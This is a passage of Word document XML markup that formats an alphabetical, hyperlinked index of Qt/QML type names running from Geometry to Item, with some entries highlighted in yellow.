                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Geometry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53" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GeometryRenderer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54" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>georectangle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55" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>geoshape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56" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Glow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57" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GLStateDumpExt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58" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GoochMaterial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59" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Gradient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60" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GradientStop</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61" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GraphicsApiFilter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62" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GraphicsInfo</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63" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Gravity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964" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Grid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65" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GridLayout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66" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GridMesh</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67" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GridView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968" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GroupBox: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69" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GroupBox: QtQuickControls2</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70" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GroupGoal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71" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Gyroscope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72" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GyroscopeReading</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69" w:name="h"/>
            <w:bookmarkEnd w:id="1169"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>H</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73" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HandwritingInputPanel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74" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HandwritingModeKey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75" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HBarModelMapper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76" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HBoxPlotModelMapper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77" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HCandlestickModelMapper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78" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HeightMapSurfaceDataProxy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79" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HideKeyboardKey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80" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HistoryState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81" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HolsterReading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82" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HolsterSensor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83" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HorizontalBarSeries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84" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HorizontalPercentBarSeries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85" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HorizontalStackedBarSeries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86" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HPieModelMapper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87" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HueSaturation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988" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>HXYModelMapper</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>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bookmarkStart w:id="1170" w:name="i"/>
            <w:bookmarkEnd w:id="1170"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I</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989" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Icon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90" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Image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91" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ImageModel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92" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ImageParticle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93" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>InnerShadow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94" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>InputChord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95" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>InputContext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96" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>InputEngine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97" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>InputHandler3D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98" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>InputMethod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999" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>InputPanel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00" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>InputSequence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01" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>InputSettings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02" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Instantiator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03" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>int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04" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>IntValidator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05" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>IRProximityReading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06" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>IRProximitySensor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07" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Item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08" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
